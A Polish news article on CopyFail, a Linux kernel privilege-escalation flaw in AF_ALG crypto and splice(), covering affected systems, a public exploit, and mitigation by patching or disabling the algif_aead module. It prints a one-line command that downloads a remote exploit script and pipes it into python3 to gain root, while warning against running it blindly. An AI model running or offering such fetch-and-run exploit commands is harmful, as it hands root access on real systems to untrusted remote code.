Krytyczna luka CopyFail w Linuksie umożliwia przejęcie uprawnień roota

Luka została wykryta przez skaner wspomagany sztuczną inteligencją i dotyczy błędu logicznego w kodzie kryptograficznym jądra systemu. Choć jest to podatność lokalna, a nie zdalna, może mieć dramatyczne skutki na środowiskach współdzielonych, takich jak hostingi czy serwery Kubernetes.

Kluczowe wnioski

• Podatność CopyFail (CVE-2026–31431) dotyka wszystkie dystrybucje Linux wydane po 2017 roku i umożliwia uzyskanie uprawnień roota.
• Kod eksploitacyjny jest publicznie dostępny jako 732-bajtowy skrypt Python dostępny pod adresem copy.fail/exp.
• Luka powstała w wyniku błędu w kodzie kryptograficznym jądra związanego z uwierzytelnianiem przez AF_ALG i funkcją splice().
• Szczególnie zagrożone są środowiska współdzielone jak hostingi, serwery Kubernetes i systemy CI/CD.
• Poprawka jest już dostępna w mainline kernela (commit a664bf3d603d) od 1 kwietnia 2026 roku.

Jak sprawdzić podatność systemu

Niebezpiecznik udostępnił prosty sposób weryfikacji podatności, jednak ostrzega przed bezmyślnym kopiowaniem kodu z internetu. Test można wykonać poleceniem:

curl https://copy.fail/exp | python3 && su

Jeśli po uruchomieniu pojawi się komunikat uid=0(root), system jest podatny na atak. Jednak eksperci kategorycznie odradzają „pajpowanie” kodu bezpośrednio do terminala bez wcześniejszego przeglądu.

Właściwym podejściem jest najpierw pobranie i przeanalizowanie kodu lokalnie, ewentualnie z pomocą asystenta AI, a dopiero potem jego uruchomienie. Złośliwe strony mogą bowiem serwować różną zawartość przeglądarkom i narzędziom wiersza poleceń (User-Agent cloaking).

Mechanizm ataku i sposoby ochrony

Luka wynika z błędu logicznego umożliwiającego niewielkie zapisy w pamięci podręcznej stron (page cache), co może naruszyć integralność binarek setuid, takich jak /usr/bin/su. W praktyce oznacza to możliwość przejęcia kontroli nad systemem przez zwykłego użytkownika.

Najbezpieczniejszym rozwiązaniem jest aktualizacja jądra do wersji zawierającej poprawkę (commit a664bf3d603d). Jeśli aktualizacja nie jest możliwa, można tymczasowo wyłączyć podatny moduł poleceniami:

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true

Odkrycie tej podatności przez skaner wspomagany AI podkreśla rosnącą rolę sztucznej inteligencji w cyberbezpieczeństwie. CopyFail stanowi poważne zagrożenie szczególnie dla administratorów środowisk wieloużytkownikowych i konteneryzowanych, gdzie eskalacja uprawnień może prowadzić do kompromitacji całej infrastruktury.